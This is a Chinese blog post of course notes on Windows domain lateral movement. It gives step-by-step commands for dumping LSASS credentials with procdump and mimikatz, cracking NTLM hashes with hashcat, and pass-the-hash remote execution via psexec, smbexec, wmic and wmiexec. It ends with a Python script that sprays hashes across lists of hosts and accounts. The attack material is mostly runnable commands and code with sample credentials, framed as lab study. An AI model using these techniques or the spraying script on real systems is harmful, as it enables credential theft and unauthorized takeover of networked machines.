域横向移动 -基于smb&wmi 明文或 hash 传递

最新推荐文章于 2023-06-09 20:01:15 发布
最新推荐文章于 2023-06-09 20:01:15 发布
阅读量765 收藏
点赞数
分类专栏: 小迪笔记 文章标签: 网络安全
原文链接:https://blog.csdn.net/qq_53577336/article/details/120588404
版权

内网 域横向 基于smb&wmi 明文或 hash 传递

在这里插入图片描述
在这里插入图片描述

演示案例:

 Procdump+Mimikatz 配合获取
 Hashcat 破解获取 Windows NTML Hash
 域横向移动 SMB 服务利用-psexec,smbexec
 域横向移动 WMI 服务利用-cscript,wmiexec,wmic
 域横向移动以上服务 hash 批量利用-python 编译 exe

案例 1-Procdump+Mimikatz 配合获取

1.1procdump 配合 mimikatz

procdump -accepteula -ma lsass.exe lsass.dmp

生成lsass.dmp

1.2mimikatz 上执行:

privilege::debug

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

在这里插入图片描述

2.Pwdump7

3.QuarksPwdump

hashcat:1000 --解密hash

hashcat -a0-m 1000hash file --force

案例 2-域横向移动 SMB 服务利用-psexec,smbexec(官方自带)

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。

psexec,smbexec是基于SMB服务的连接,需要开启445端口,获取明文或者hash值

1.psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递

1)psexec传递:
第一种:建立ipc连接,明文或者hash传递,需要对方的administrator权限,否则会错误
psexec是微软官方,不会被杀:https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

1.建立ipc连接:net use \\192.168.213.163\ipc$ "123.com" /user:administrator
2.使用psexec返回cmd窗口:psexec \\192.168.213.163 -s cmd
# 需要先有 ipc 链接 -s 以 System 权限运行

2.psexec 第二种:不用建立 IPC 直接提供明文账户密码

1.psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
2.psexec -hashes :$HASH$ ./administrator@10.1.2.3
3.psexec -hashes :$HASH$ domain/administrator@10.1.2.3
4.psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32          

官方 Pstools 无法采用 hash 连接,用impacket 里的psexec可以用hash

在这里插入图片描述

3.非官方自带-参考 impacket 工具包使用,操作简单,容易被杀

  1. smbexec 无需先 ipc 链接 明文或 hash 传递

    这是使用impacket工具包,
    exe下载地址:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip
    py版本:https://github.com/SecureAuthCorp/impacket

    1.smbexec god/administrator:Admin12345@192.168.3.21
2.smbexec ./administrator:admin!@#45@192.168.3.32
3.smbexec -hashes :$HASH$ ./admin@192.168.3.21
4.smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
5.smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21

    案例 3-域横向移动 WMI 服务利用-cscript,wmiexec,wmic

    WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

    1.自带 WMIC 明文传递 无回显
    建立连接,返回的值在对方主机需要进行读取:
wmic /node:192.168.230.142 /user:administrator /password:Admin12345 process call create "cmd.exe /c
 ipconfig >C:\1.txt"

在这里插入图片描述

在这里插入图片描述

2.自带 cscript 明文传递 有回显

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

3.套件 impacket wmiexec
明文或 hash 传递 有回显 exe 版本,可能容易被杀

工具包地址:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip

明文或 hash 传递 有回显 exe 版本

1.工作组环境:wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
2.域环境:wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
3.wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
4.wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"
5.查看c盘:wmiexec hsyy.com/administrator:123.com@192.168.213.163 "dir /c"

在这里插入图片描述

案例 4-域横向移动以上服务 hash 批量利用-python 编译 exe

py批量检测,循环账户密码,

使用python的pyinstaller模块导出exe执行 

pyinstaller.exe -F fuck_neiwang_002.py

exp:

import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.32'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:
for user in users:
for mimahash in hashs:
#wmiexec -hashes :hashgod/user@ipwhoami
exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
print('--->' + exec + '<---')
os.system(exec)
time.sleep(0.5)

涉及资源:

https://github.com/hashcat/hashcat
https://www.freebuf.com/sectool/164507.html
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/SecureAuthCorp/impacket
https://gitee.com/RichChigga/impacket-examples-windows
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://docs.microsoft.com/zh-
cn/sysinternals/downloads/procdump
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取码:xiao
明月清风~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何通过破解hash来获取管理员密码
12-28
如何通过破解hash来获取管理员密码. 高手勿进。
【内网安全-横向移动WMI-WMIC命令&相关内网工具
02-08 8775
横向移动-WMI-WMIC命令】wmic、impacket-wmiexecwmicmd.exe、WMIHACKER
p67 内网安全-横向 smb&wmi 明文hash 传递
weixin_43263566的博客
04-24 542
p67 内网安全-横向 smb&wmi 明文hash 传递
网安学习-内网渗透3
weixin_44770698的博客
07-30 5133
网安学习-内网渗透3(单纯记录学习思路)
内网安全“小迪安全课堂笔记”横向
weixin_42902126的博客
05-09 3591
内网安全内网安全-环境&工作组&局网探针方案基本认知环境与工作组的区别环境靶机案例 1-基本信息收集操作演示案例 2-网络信息收集操作演示案例 3-用户信息收集操作演示案例 4-凭据信息收集操作演示计算机用户 HASH明文获取-mimikatz(win),mimipenguin(linux)计算机各种协议服务口令获取-LaZagne(all),XenArmor(win)案例 5-探针主机控架构服务操作演示涉及资源横向批量at&schtasks&impacket 内
横向移动-传递攻击WMI服务利用cscript&vmiexec&wmic
m0_65096687的博客
05-28 191
wim是通过135端口进行利用的,支持明文hash的方式进行认证,并且不会在目标系统日志下留下痕迹。
内网安全:横向传递攻击(SMB || WMI 明文hash 传递
最新发布
网络安全领域___专研者.
06-09 2431
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文Hash值获取基础上进行攻击.)
【内网渗透】横向smb&wmi明文hash传递
ssrf
03-07 1346
目录0x001 Procdump+Mimikatz配合获取用户信息0x002 无法获取明文密码解决方案1)hashcat暴力破解2)注册表操作开启Wdigest Auth值3)SMB服务协议进行哈希移动4)WMI服务利用-cscript,wmiexec,wmic 0x001 Procdump+Mimikatz配合获取用户信息 Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地
内网安全-横向smb&wmi明文hash传递
xhscxj的博客
03-11 3627
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMBWMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 ...
控-笔记四(综合应用)
5L2g556F5ZWl77yf
11-25 2458
文章目录一. 添加路由1.1 路由1.2 sockes1.3 shell乱码二. 判断环境三. 定位控四. 非信息收集4.1 防火墙问题4.2 端口转发五. 凭据窃取5.1 mimikatz5.2 procdump+mimikatz5.3 LaZagne六. 横向6.1 IPC+计划任务6.1.2 ipc6.1.3 计划任务6.1.4 常见IPC错误6.2 PsTools6.4 WMI6.4.1 wmiexec.vbs6.5 WinRM6.5.1 WinRS6.5.2 Powershell Inv
电信设备-一种基于WMI软件白名单机制的移动安全办公方法.zip
09-19
电信设备-一种基于WMI软件白名单机制的移动安全办公方法.zip
go-wmi-hyper-v.txt
09-28
go通过调用Windows wmi 生成hyper-v虚拟机,不包括修改内存,CPU等操作
dotnet-SharpWMI是各种WMI功能的C实现
08-15
SharpWMI是各种WMI功能的C#实现
clevo-xsm-wmi:https的克隆
05-11
clevo-xsm-wmi 用于Clevo SM系列笔记本电脑的键盘背光的内核模块。 (以及几种EM / ZM / DM系列型号) 基于TUXEDO Computers GmbH创建的tuxedo-wmi。 在tuxedo-wmi上的添加 Sysfs界面可在模块加载后控制亮度,...
论文研究-基于WMI技术的无代理主机入侵检测系统模型设计.pdf
07-22
Windows管理设备(WMI)是微软操作系统的一个组成部分,它是微软的一个基于Web的企业管理(WBEM)的实现。研究并建立了一个基于WMI技术的无代理主机入侵检测系统,很好地克服了传统的基于主机的入侵检测系统在部署和...
内网安全 - 横向 smb&wmi
acepanhuan的博客
03-15 272
通过官方PSTools中psexec连接时只能用明文密码进行连接,但是不会被杀毒软件拦截通过官方自带命令WMIC时,只支持明文且没有回显需自己读取通过官方自带命令cscriptwmiexec.vbs配合时有回显,但是只支持明文通过非官方impacket-examples-windows中psexecsmbexecwmiexec连接时可支持密文hash密码连接,但容易被杀毒软件拦截现在基本通过mimikatz获取的密码都是密文的impacket-examples-windows下载地址。
横向移动检测之远程执行(四)WMI/WMIC
qq_27828281的博客
12-13 4538
横向移动——WMI/WMIC远程执行分析及溯源
【内网安全】 横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射
今天是几号的博客
03-27 1072
PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击,总结:KB2871997补丁后的影响。
【内网安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
今天是几号的博客
03-25 1352
简单使用ms14-058提权后,得到sysytem权限。IPC是专用管道,可以实现对远程计算机的访问, 需要使用目标系统用户的账号密码,使用139、445端口。 1. 建立IPC链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4. 删除IPC链接 常用ipc命令总结 net use \\192.168.3.32\ipc$ "Admin12345" /user:god.org\administrator #新建连接 net
SMB横向移动为什么可以执行命令
05-12
SMB横向移动是指攻击者通过网络中的一台受感染的计算机,利用该计算机已有的权限和凭据,向网络中的其他计算机进行攻击。攻击者通过在受感染的计算机上执行恶意代码,获取该计算机上的凭据,例如用户名和密码等,然后使用这些凭据来访问其他计算机,从而在整个网络中传播并执行命令。 攻击者通常利用弱密码、漏洞或社会工程学等手段来获取受感染计算机上的凭据。一旦攻击者获取了这些凭据,他们可以使用这些凭据来横向移动并在网络中执行命令,例如安装后门程序、窃取敏感数据、操纵系统配置等等。因此,保护网络中的计算机和减少弱点是非常重要的,以防止SMB横向移动攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值